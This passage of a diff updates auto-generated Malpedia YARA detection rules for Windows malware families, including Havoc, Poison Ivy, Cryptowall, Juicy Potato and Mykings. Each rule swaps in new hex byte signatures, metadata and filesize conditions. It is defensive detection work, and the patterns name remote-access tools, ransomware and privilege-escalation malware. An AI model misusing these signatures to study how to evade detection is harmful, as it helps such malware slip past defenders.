57 e8???????? 58 } - $sequence_6 = { c3 38ed 817e24200000e0 7473 } - $sequence_7 = { 668b00 6631c8 39c8 6631c3 6681fb4d5a 7407 6639c1 } - $sequence_8 = { 0fbae11f 0f82d63c0000 61 0faee8 0f31 0faee8 c1e220 } - $sequence_9 = { 75e4 83e902 83f900 7deb ff742404 } + $sequence_0 = { 7403 51 eb04 0fb7c0 50 ff7508 } + $sequence_1 = { 56 53 e8???????? 8b463c 68f8000000 } + $sequence_2 = { ff75fc 8d85b0f7ffff 50 ff75f4 } + $sequence_3 = { 59 894508 85c0 750f 8b470c } + $sequence_4 = { 85c0 0f848b000000 57 8d3c18 8b470c 85c0 } + $sequence_5 = { 8a0a 84c9 75f1 c3 682680acc8 } + $sequence_6 = { 83c0c0 50 8d4640 50 8d4340 } + $sequence_7 = { 68dff0f081 6a01 e8???????? 83c40c 8d8d9cfdffff 51 ffd0 } + $sequence_8 = { 6880000000 6a03 56 56 53 } + $sequence_9 = { 59 59 ff742404 ffd0 c3 6831f478b7 } condition: - 7 of them and filesize <90112 + 7 of them and filesize <41024 } -rule MALPEDIA_Win_Client_Maximus_Auto : FILE +rule MALPEDIA_Win_Juicy_Potato_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "9ae68e0c-f7b3-57b3-a5e5-43c9d1c73212" + id = "03dfaa0e-28b0-58bd-8b17-d8d3c88d86a7" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.client_maximus" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.client_maximus_auto.yar#L1-L118" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.juicy_potato" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.juicy_potato_auto.yar#L1-L129" license_url = "N/A" - logic_hash = "b18f0f0d0ef0e4099637c9406b0101b6f1ae3668adb85f5994962285717f3168" + logic_hash = "270473eb74e147cca3eabdeead641e5c572494e923c2e4deeae8d94ea8e99f5c" score = 75 quality = 75 tags = "FILE" @@ -141114,32 +143987,32 @@ rule MALPEDIA_Win_Client_Maximus_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 89f0 0fb6c0 0fb61403 88140b 83c101 89fa 81f900010000 } - $sequence_1 = { 89e5 56 53 83ec10 8b1d???????? } - $sequence_2 = { 893424 ff15???????? 83ec08 85c0 7411 } - $sequence_3 = { e8???????? 8b4304 85c0 741d 8b5330 c744240800800000 c744240400000000 } - $sequence_4 = { 39730c 7fe1 891424 e8???????? } - $sequence_5 = { 7429 c70424???????? ff15???????? 83ec04 a3???????? } - $sequence_6 = { 8b4628 85c0 7535 c70424???????? } - $sequence_7 = { a3???????? c7442404???????? 893424 ff15???????? 83ec08 85c0 7411 } - $sequence_8 = { 89c8 0fb63c0b 99 f77c241c 89f8 } - $sequence_9 = { 89f8 02441500 01c6 89f0 0fb6c0 } + $sequence_0 = { 488b5010 498b4910 48ffc9 488bc2 48d1e8 4823c8 } + $sequence_1 = { 4053 4883ec20 488bd9 488bc2 488d0dade40100 48890b 488d5308 } + $sequence_2 = { 488d5e08 488b03 6683382d 0f8598010000 0fb74002 83c09f } + $sequence_3 = { 4889450f 4883c8ff 488955ff 488bc8 } + $sequence_4 = { 488bd7 4c8d05dec60300 83e23f 488bcf 48c1f906 48c1e206 498b0cc8 } + $sequence_5 = { 48894728 4883f8ff 7437 448b4310 488b5320 488bc8 ff15???????? } + $sequence_6 = { e8???????? ff15???????? b801000000 e9???????? 488b5c2438 4885db 7470 } + $sequence_7 = { 488d15159c0100 ff15???????? 4885c0 0f8429030000 488bc8 e8???????? 488bcb } + $sequence_8 = { 7509 488d056f200400 eb04 4883c024 8938 e8???????? 488d1d57200400 } + $sequence_9 = { ff15???????? ba10000000 663bc2 7312 488bd3 488d0d6df80200 ff15???????? } condition: - 7 of them and filesize <106496 + 7 of them and filesize <736256 } -rule MALPEDIA_Win_Unidentified_039_Auto : FILE +rule MALPEDIA_Win_Wannahusky_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "79803854-9c28-5ee4-826a-7f1227d74ba5" + id = "b2ad3b67-4e34-5409-83f1-3168450902fa" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_039" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.unidentified_039_auto.yar#L1-L126" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.wannahusky" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.wannahusky_auto.yar#L1-L117" license_url = "N/A" - logic_hash = "58c8fb21d6ae978d62ed7528cfbdb8da381c56d520ca5623fbbc73c80d3173d3" + logic_hash = "77e82dda4e107ad0b0d473cd2e43d110eacdad7445bdb06e12858f482aa9bc9d" score = 75 quality = 75 tags = "FILE" @@ -141153,32 +144026,32 @@ rule MALPEDIA_Win_Unidentified_039_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { b8???????? e8???????? 8365fc00 8365cc00 c745dce7600000 c745ec89640000 } - $sequence_1 = { c745f00b090000 c745f089000000 8975c0 c745f4b76e0000 c745fc9e540000 c745f8a7600000 } - $sequence_2 = { c74530284c0000 c7453425120000 c745281f480000 c74538136b0000 c74520825d0000 c7451c84360000 8b4530 } - $sequence_3 = { 69c9de3f0000 33c1 8945dc 8b4510 8b4d0c 3bc8 7d0c } - $sequence_4 = { 8bec 51 51 c745f81d2d0000 c745f8d33a0000 c745fc9a790000 } - $sequence_5 = { c745d0e5720000 8b45d0 8b4dd4 0fafc1 8b4dd8 8b55dc } - $sequence_6 = { 6bc01f c1e704 83c30c 03fa 33d2 } - $sequence_7 = { 69c0295a0000 8945e4 e8???????? c745e0f9750000 c745f0b56c0000 c745ec29110000 } - $sequence_8 = { 8d45f4 64a300000000 c3 6a00 6a01 ff74240c } - $sequence_9 = { c745e863430000 8b45e4 59 8b4df8 23c1 8b4de8 81e931570000 } + $sequence_0 = { eb0c 3d00010000 19c9 f7d1 83e108 d3e8 0fbe80e0184100 } + $sequence_1 = { c7442404ffffffff c7042400000000 e8???????? 89d9 } + $sequence_2 = { 8b08 e8???????? 84c0 7449 c78554fbffff00000000 a1???????? } + $sequence_3 = { 7405 8b08 83c11a e8???????? ba???????? e8???????? } + $sequence_4 = { e9???????? 8b4dc0 394dbc 7212 } + $sequence_5 = { 66c705????????1101 c605????????01 c705????????2c000000 c705????????80ba4100 c705????????0c1e4100 } + $sequence_6 = { 8d57ff 89542404 e8???????? 8b45bc 8b4db8 } + $sequence_7 = { 89c1 58 5b 5d e9???????? 55 } + $sequence_8 = { c705????????78b54100 c705????????00000000 c705????????04000000 c705????????04000000 } + $sequence_9 = { c705????????14000000 c705????????00484200 c705????????b41d4100 c705????????30b54100 c705????????00000000 c705????????04000000 } condition: - 7 of them and filesize <262144 + 7 of them and filesize <862208 } -rule MALPEDIA_Win_Crypt0L0Cker_Auto : FILE +rule MALPEDIA_Win_Maudi_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "3ca18c92-db73-54b4-928d-eb72333dfc4b" + id = "3e4205bc-621f-57ac-9783-0d7a80e63274" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.crypt0l0cker" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.crypt0l0cker_auto.yar#L1-L131" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.maudi" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.maudi_auto.yar#L1-L121" license_url = "N/A" - logic_hash = "3ce866cbdb58e590ea553be6664221b117cb83d9a5d4d70643f018e4fb580d20" + logic_hash = "ae4372c99a5ab8731cfa27286c0755a13272fa053f753c6557e155320ea94c91" score = 75 quality = 75 tags = "FILE" @@ -141192,32 +144065,32 @@ rule MALPEDIA_Win_Crypt0L0Cker_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 85c0 0f8486000000 53 8d58ff c1eb02 56 } - $sequence_1 = { 8b4640 85c0 0f8479000000 83780c00 7473 6800010000 e8???????? } - $sequence_2 = { 85f6 0f8ead000000 8d4108 8d04b8 894508 8b4510 83c008 } - $sequence_3 = { 55 56 8d44240f 8bea 50 6a01 ff35???????? } - $sequence_4 = { 83c40c 33c0 6689043b 897e08 85ff 0f84d6000000 } - $sequence_5 = { 8b4c243c 8b442430 8911 894104 eb17 8bcf e8???????? } - $sequence_6 = { b9???????? 3d90010000 0f4cce 8bf1 8b7f04 85f6 74c9 } - $sequence_7 = { 8bce e8???????? 8bf8 83c408 85ff 7438 83c705 } - $sequence_8 = { 68???????? 6a05 6840b6b9a6 6a1c e8???????? 83c424 } - $sequence_9 = { 0f8581020000 807dee81 0f8577020000 ff75ef ff15???????? 8b0f 8bd3 } + $sequence_0 = { 5d 8b542408 4a 0f85d9000000 68???????? 87d1 } + $sequence_1 = { 87d1 87ca 51 51 51 } + $sequence_2 = { 56 55 89e5 5d 89e6 fc ad } + $sequence_3 = { 89e5 5d 89e6 fc ad 6804010000 56 } + $sequence_4 = { 59 ffe7 6800400000 6a00 57 68???????? } + $sequence_5 = { cd03 cd02 68???????? 87d1 87ca 51 } + $sequence_6 = { 59 59 ffe7 6800400000 6a00 } + $sequence_7 = { 6804010000 56 50 68???????? 87d1 } + $sequence_8 = { 59 59 ff25???????? 55 } + $sequence_9 = { 5d b986180000 55 89e5 5d be???????? } condition: - 7 of them and filesize <917504 + 7 of them and filesize <40960 } -rule MALPEDIA_Win_Zedhou_Auto : FILE +rule MALPEDIA_Win_Atmitch_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "2aa4d978-6d48-5f72-a16b-4b6ea617b5b6" + id = "5a61b640-3c5c-5518-8891-5d83a0b89c2d" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.zedhou" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.zedhou_auto.yar#L1-L129" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.atmitch" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.atmitch_auto.yar#L1-L121" license_url = "N/A" - logic_hash = "b60fc9437fc4bcd4e7a504c33358b6d6c8b7b5e0237aab2ee62dd854e5c508d6" + logic_hash = "565ce987fa9e005b7e196a8bfd57c4f682eb318d752a50049029192ea9e40f26" score = 75 quality = 75 tags = "FILE" @@ -141228,35 +144101,35 @@ rule MALPEDIA_Win_Zedhou_Auto : FILE malpedia_hash = "fc8a0e9f343f6d6ded9e7df1a64dac0cc68d7351" malpedia_version = "20230808" malpedia_license = "CC BY-SA 4.0" - malpedia_sharing = "TLP:WHITE" - - strings: - $sequence_0 = { 8b4dac 894dd8 8d55d0 52 8d45d4 50 } - $sequence_1 = { ff5030 5f 5e 5b c9 c22400 } - $sequence_2 = { 57 ff7508 56 ff15???????? ff7508 ff15???????? 8bc6 } - $sequence_3 = { 8d4da4 51 8b5508 8b02 8b4d08 51 ff9008070000 } - $sequence_4 = { ff15???????? 8d4dc0 ff15???????? 0fbf4598 85c0 742a c745fc06000000 } - $sequence_5 = { 68???????? 8b85acfeffff 50 8b8da8feffff 51 ff15???????? 8985c4fdffff } - $sequence_6 = { 33c0 f3a6 0f85653a0000 85d2 } - $sequence_7 = { ff15???????? 83c41c c745fc04000000 8b5508 8b02 8b4d08 51 } - $sequence_8 = { ff15???????? c745fc7f000000 8b5508 8b4238 50 68???????? ff15???????? } - $sequence_9 = { e8???????? 894604 8b430c 59 8b04c5fc201822 59 6a01 } + malpedia_sharing = "TLP:WHITE" + + strings: + $sequence_0 = { c644244803 ff15???????? 8d4c2418 51 68???????? } + $sequence_1 = { 33c4 89842410020000 56 51 8bcc } + $sequence_2 = { 8bfe f7df 896c241c 0fb744242c 50 51 } + $sequence_3 = { 51 833d????????00 7422 a1???????? 50 } + $sequence_4 = { ff15???????? e8???????? 8b0e 8b5138 83c408 } + $sequence_5 = { c744241c00000000 b8???????? c60000 83c004 3d???????? 7cf3 68???????? } + $sequence_6 = { 8bcc 89642410 68???????? ff15???????? e8???????? 0fb705???????? 83c408 } + $sequence_7 = { ff15???????? 83bc24fc00000000 7432 8b4c2408 8b41f4 } + $sequence_8 = { c644244803 ff15???????? 8d4c2418 51 68???????? 8d542428 52 } + $sequence_9 = { 83c404 50 ff15???????? 50 51 } condition: - 7 of them and filesize <499712 + 7 of them and filesize <73728 } -rule MALPEDIA_Win_Havoc_Auto : FILE +rule MALPEDIA_Win_Cryptowall_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "effddaaf-e7fe-58ad-88f4-e26f6d7794a2" + id = "4b008ce5-4135-5555-ab2d-ce0ccd0475ff" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.havoc" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.havoc_auto.yar#L1-L121" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptowall" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.cryptowall_auto.yar#L1-L114" license_url = "N/A" - logic_hash = "dea553016c43a89176918937bfc9793358dadd2541e82f3880161a16c9ccfd07" + logic_hash = "496e72f17aa4e054ce74cb3a6412cb731c4d48c85c6550891be7fb095dff5a0a" score = 75 quality = 75 tags = "FILE" @@ -141270,32 +144143,32 @@ rule MALPEDIA_Win_Havoc_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 85c0 7856 488b842488000000 488bb42488000000 4531c9 } - $sequence_1 = { 48898424ae000000 4c8d442458 ba2a040000 8b842498000000 4889442448 } - $sequence_2 = { 4488440101 448a440202 4488440102 448a440203 4488440103 4883c004 4883f820 } - $sequence_3 = { 4885c0 7504 31f6 eb08 488b4030 ffc3 } - $sequence_4 = { 55 4c89c5 57 56 4889d6 53 } - $sequence_5 = { 4883ec28 488b410c 488b4904 488d5008 488b05???????? } - $sequence_6 = { 488d4b10 4c8d4c2460 4889442460 8b442478 ba00000002 4c8d842490000000 } - $sequence_7 = { f3a5 488bbc2480000000 488b742460 b934010000 f3a5 } - $sequence_8 = { baff010f00 c744244001000000 4889442444 31c0 85f6 } - $sequence_9 = { 4155 4154 4531e4 55 57 56 53 } + $sequence_0 = { 85c0 7504 33c0 eb21 0fb74d08 83f961 } + $sequence_1 = { b979000000 66894de6 ba73000000 668955e8 } + $sequence_2 = { e8???????? 83c408 8b0d???????? 898164010000 } + $sequence_3 = { 55 8bec 51 837d0800 7441 837d0c00 } + $sequence_4 = { 7d1f 6a09 6a00 e8???????? } + $sequence_5 = { e8???????? 83c408 8b0d???????? 8901 68f2793618 } + $sequence_6 = { 8b4508 668910 8b4d08 83c102 894d08 eb02 eba1 } + $sequence_7 = { 668955e8 b874000000 668945ea b965000000 } + $sequence_8 = { 7511 6aff 8b4508 50 } + $sequence_9 = { 6a00 6a00 6a40 6a01 6a01 6880000000 } condition: - 7 of them and filesize <164864 + 7 of them and filesize <417792 } -rule MALPEDIA_Win_Poison_Ivy_Auto : FILE +rule MALPEDIA_Win_Chairsmack_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "ec8c2f98-412f-543c-9758-b1aacde91b4e" + id = "89ef8364-1d04-5ec8-8eb0-0caa1f808e4e" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.poison_ivy" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.poison_ivy_auto.yar#L1-L91" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.chairsmack" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.chairsmack_auto.yar#L1-L132" license_url = "N/A" - logic_hash = "431acfd8496c54390529508a28488eb12118d11f97e2de9a76cce0e819bacb59" + logic_hash = "30e742a004c4313020160ca17f15835b780b5f554d2c7d95b7655ea180005855" score = 75 quality = 75 tags = "FILE" @@ -141309,29 +144182,32 @@ rule MALPEDIA_Win_Poison_Ivy_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { ff9681000000 80beaf08000001 7507 b902000080 eb05 } - $sequence_1 = { b902000080 eb05 b901000080 8d45fc } - $sequence_2 = { 51 ff5635 68ff000000 8d86b1060000 } - $sequence_3 = { 50 6a01 6a00 8d86120e0000 50 ff75fc } - $sequence_4 = { b901000080 8d45fc 50 683f000f00 6a00 57 51 } - $sequence_5 = { 51 57 ff9681000000 8d45fc } - $sequence_6 = { 8d86120e0000 50 ff75fc ff563d ff75fc ff5631 } + $sequence_0 = { 8d8c2410010000 c68424840300003a e8???????? 83ec1c 8d842428010000 8bcc 8964242c } + $sequence_1 = { 8d4de8 56 c745fc01000000 e8???????? 8b7df0 8d4de8 2b7e08 } + $sequence_2 = { 8d4c2464 e8???????? e9???????? 68???????? 8d8c24bc000000 e8???????? 8bd0 } + $sequence_3 = { 8b4004 eb03 83c004 51 50 ffb4249c000000 51 } + $sequence_4 = { 660f57c4 8b7c2414 8d442421 c644242025 8b5714 f6c220 7409 } + $sequence_5 = { 7613 b8feffff7f 8d3419 2bc1 3bd8 7605 befeffff7f } + $sequence_6 = { 8d8db8fcffff e9???????? 8d8dd0fdffff e9???????? 8d8dbcfcffff e9???????? 8d8dc0fdffff } + $sequence_7 = { c68424b8030000b9 8bcc 68???????? e8???????? c68424b8030000b6 e8???????? 83c430 } + $sequence_8 = { 8b148dd06d4a00 81c200080000 3955e4 7366 8b45e4 c6400400 8b4de4 } + $sequence_9 = { 0fbe02 85c0 0f848e010000 8b4dfc 51 } condition: - 7 of them and filesize <204800 + 7 of them and filesize <1974272 } -rule MALPEDIA_Win_Newpass_Auto : FILE +rule MALPEDIA_Win_Mykings_Spreader_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "dfd78470-0c07-5107-9bdf-99560c1551b3" + id = "96a12e80-b15f-580e-920d-d6c0d35464b0" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.newpass" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.newpass_auto.yar#L1-L131" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mykings_spreader" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.mykings_spreader_auto.yar#L1-L132" license_url = "N/A" - logic_hash = "18487b3a938727b19644b6d1320bc7ccc85217d142f24fc2488ac5f5fe73de66" + logic_hash = "1bcd674173fea4b83a2f4219e8f61306a972490f94a89cfaf5e1f466fdec8eff" score = 75 quality = 75 tags = "FILE" @@ -141345,32 +144221,32 @@ rule MALPEDIA_Win_Newpass_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 4d8bc4 eb0f 4983c8ff 49ffc0 6642833c4700 75f5 488bd7 } - $sequence_1 = { 488d542470 48837d8810 480f43542470 488b5910 4883791810 7203 } - $sequence_2 = { 85c0 792e 488b842490000000 4889442428 4c8bce 440fb6c7 488d542470 } - $sequence_3 = { eb09 418bc7 493bf6 0f95c0 85c0 7906 488b7f10 } - $sequence_4 = { 7503 488b07 483bc8 741b 448bc2 488bd0 e8???????? } - $sequence_5 = { c7411006160000 8b4110 0f49c2 488939 894110 b001 } - $sequence_6 = { 488bcb e8???????? 84c0 753d 488bcb e8???????? 3a4500 } - $sequence_7 = { 4c0f44ca 41397920 7340 498b4110 488bd3 498bca } - $sequence_8 = { 7410 4c8bce 488bc8 e8???????? 488bd8 eb03 498bdd } - $sequence_9 = { 807a1900 7525 488bc2 488b12 807a1900 7539 6666660f1f840000000000 } + $sequence_0 = { 7519 51 55 8bce e8???????? 6a00 6a00 } + $sequence_1 = { 8b1e ff938c000000 8b0424 8b5014 85d2 7507 bf00000000 } + $sequence_2 = { e8???????? 837e1800 7439 8b4620 c1e003 89c7 8b4618 } + $sequence_3 = { 89c1 c745f401000000 3b4df4 723d ff4df4 8d7600 ff45f4 } + $sequence_4 = { 68???????? 50 ff15???????? a3???????? 83c0fe 40 40 } + $sequence_5 = { 8942fc 89d8 c1f81f 8b1424 8b7208 8b4a0c 29de } + $sequence_6 = { eb02 b300 e8???????? 8d45cc e8???????? c745cc00000000 58 } + $sequence_7 = { 33d2 b9???????? 8bc2 8bf2 c1f805 83e61f 8b0485a02e4100 } + $sequence_8 = { 89d8 29f0 85c0 7e39 8b55f4 85d2 7505 } + $sequence_9 = { 8b7508 8b36 8975c8 8b7d08 8b7f04 } condition: - 7 of them and filesize <2654208 + 7 of them and filesize <1581056 } -rule MALPEDIA_Win_Miuref_Auto : FILE +rule MALPEDIA_Win_Netkey_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "34f2a1cb-9745-52c8-a75d-06d5cdb25bcd" + id = "76292b9d-6066-51f2-940c-21859c007253" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.miuref" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.miuref_auto.yar#L1-L132" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.netkey" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.netkey_auto.yar#L1-L129" license_url = "N/A" - logic_hash = "0abc04edb362ffc2e411d61d44a4ba6937064194bb7ee145b0929a61d91bcae4" + logic_hash = "0ca26012e9d146d53c4ba2a355f1655827a5f40d6a52c39d2206e16c6e4d6ec5" score = 75 quality = 75 tags = "FILE" @@ -141384,32 +144260,32 @@ rule MALPEDIA_Win_Miuref_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 59 59 8945fc 85f6 760e 803c072e 7418 } - $sequence_1 = { ff15???????? 50 e8???????? ff750c 8906 50 e8???????? } - $sequence_2 = { 8bf0 8d7df0 a5 a5 a5 83c418 a5 } - $sequence_3 = { 6a02 ff35???????? e8???????? 8bf0 83c40c 85f6 7412 } - $sequence_4 = { 8d8300010000 ff75fc 50 e8???????? 68???????? 8d45f8 50 } - $sequence_5 = { 8b4124 83f801 7514 ff7514 ff7510 ff750c } - $sequence_6 = { 7509 0fb74e06 663bcf 7507 33c0 e9???????? } - $sequence_7 = { e8???????? 50 ff35???????? e8???????? 83c43c e9???????? 55 } - $sequence_8 = { 8d45d8 50 a5 e8???????? 83c408 8bf0 8bfc } - $sequence_9 = { 53 53 ff15???????? 50 a3???????? e8???????? 59 } + $sequence_0 = { 83c40c 83c208 8bca 81e11f000080 7905 49 } + $sequence_1 = { 83e03f c1ff06 6bd830 8b04bda8214400 f644032801 7444 837c0318ff } + $sequence_2 = { 81ec98010000 a1???????? 33c4 89842494010000 b9???????? e8???????? 8d0424 } + $sequence_3 = { 83c404 85ff 0f84c7000000 57 53 6a00 56 } + $sequence_4 = { 8bc2 8955fc 99 83e21f 8d0c02 c1f905 } + $sequence_5 = { 6a01 8845e8 8d45e8 57 50 c745c801000000 e8???????? } + $sequence_6 = { 42 668955ec e8???????? 99 be3b000000 f7fe } + $sequence_7 = { 780d b801000000 5f 5e 5b 59 } + $sequence_8 = { 83c8ff eb07 8b04cd8c6a4300 5f 5e 5b 8be5 } + $sequence_9 = { 8d8fd8000000 e8???????? 0f1005???????? 8d95f0fbffff 8d4a01 0f1185f0fbffff } condition: - 7 of them and filesize <180224 + 7 of them and filesize <606208 } -rule MALPEDIA_Win_Unidentified_071_Auto : FILE +rule MALPEDIA_Win_Sanny_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "9e4ae8e5-b01b-5dfb-9ebf-d96081ff094b" + id = "de370068-b36d-54a3-8d87-5388d41e6079" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_071" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.unidentified_071_auto.yar#L1-L129" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.sanny" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.sanny_auto.yar#L1-L125" license_url = "N/A" - logic_hash = "cf757bc05d123f04b705025eb8059bfc6f948c6a237ae24790160c041569438f" + logic_hash = "d17095442c6476759b49de20e09af803b9389d5106c74ad1d4cc2616aa104b23" score = 75 quality = 75 tags = "FILE" @@ -141423,32 +144299,32 @@ rule MALPEDIA_Win_Unidentified_071_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { e8???????? ff35???????? a3???????? a1???????? 0faf05???????? a3???????? e8???????? } - $sequence_1 = { 6a20 8901 83c8ff 5a 895104 894108 d1e8 } - $sequence_2 = { 8bd9 8b4b10 2bc1 894c2404 3bc2 0f82a7000000 8b4314 } - $sequence_3 = { 6a10 5a 0f44ca 51 50 ff15???????? } - $sequence_4 = { c3 33c0 c3 8b5108 b8ffffff0f } - $sequence_5 = { ff36 e8???????? 8b0e 8b4608 2bc1 894df8 6a18 } - $sequence_6 = { 8b4c2420 8d346d00000000 8b542428 56 ff742428 8d044a } - $sequence_7 = { c20400 55 8bec 8b450c ff7510 2b4508 c1f804 } - $sequence_8 = { 0f8290000000 8b4314 55 56 57 8d3c11 } - $sequence_9 = { 85c0 8b4314 740d 25ffffff82 0d00000002 894314 0fb64b01 } + $sequence_0 = { 51 8bcb e8???????? 8b5310 68???????? 8d442a08 } + $sequence_1 = { 8b842430060000 8d742410 8d5901 b987000000 53 81ec1c020000 8bfc } + $sequence_2 = { ebd3 53 55 56 57 } + $sequence_3 = { 52 68???????? 56 e8???????? 8b44244c } + $sequence_4 = { 8bc2 c1c60a 03f1 f7d0 0bc6 33c1 } + $sequence_5 = { ae 40 00bcae4000e0ae 40 0023 d18a0688078a } + $sequence_6 = { 55 68???????? 55 e8???????? 8b4c2424 83c410 55 } + $sequence_7 = { 663918 747f 668b11 6683fa41 720c } + $sequence_8 = { f3ab 8b0d???????? aa 898c2408010000 b906000000 33c0 8dbc240d010000 } + $sequence_9 = { 8b44241c 8d9424dc000000 52 50 ffd5 b925000000 33c0 } condition: - 7 of them and filesize <1220608 + 7 of them and filesize <253952 } -rule MALPEDIA_Win_Sysjoker_Auto : FILE +rule MALPEDIA_Win_Freenki_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "42bbdbb2-321a-5c06-b4e0-64934ffdbef1" + id = "96c9c22a-8c0f-508a-9c8b-2adc585b1381" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.sysjoker" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.sysjoker_auto.yar#L1-L129" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.freenki" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.freenki_auto.yar#L1-L126" license_url = "N/A" - logic_hash = "272a60e5cac852c8fc52dd28ee7d3d45f227ab0f82269e4ab7d14e4de95e70fb" + logic_hash = "ea73b0cd02f4881d245e91a02d5574d630e230bb3618aadd7337accb2e33b167" score = 75 quality = 75 tags = "FILE" @@ -141462,32 +144338,32 @@ rule MALPEDIA_Win_Sysjoker_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 50 e8???????? 837de400 7416 } - $sequence_1 = { c746140f000000 c60600 e8???????? c7461060000000 8d4dd4 c746146f000000 0f1005???????? } - $sequence_2 = { ffd6 e9???????? 8bb5a8efffff 85f6 0f84ce000000 6808020000 8d85e8fdffff } - $sequence_3 = { 8d4dac e8???????? 8d4dc8 e8???????? 8d8d74ffffff c645fc1b e8???????? } - $sequence_4 = { 8bc2 b9ffffff7f 83c80f 3dffffff7f 0f47c1 894584 40 } - $sequence_5 = { 7cd5 33db 395d90 7650 0f1f4000 660f1f840000000000 83bd78ffffff10 } - $sequence_6 = { 6a02 68???????? e8???????? 8b8534efffff 83c618 8b8d4cefffff 40 } - $sequence_7 = { e8???????? 83c404 8b8780000000 33f6 89b534efffff } - $sequence_8 = { 6a01 8bce e8???????? 84c0 0f84c2feffff e9???????? 8b4778 } - $sequence_9 = { e8???????? 83c010 8906 51 c645fc25 8bf4 89b508fdffff } + $sequence_0 = { 83e03f 6bc830 8b049578394200 c644082801 897de4 c745fcfeffffff } + $sequence_1 = { 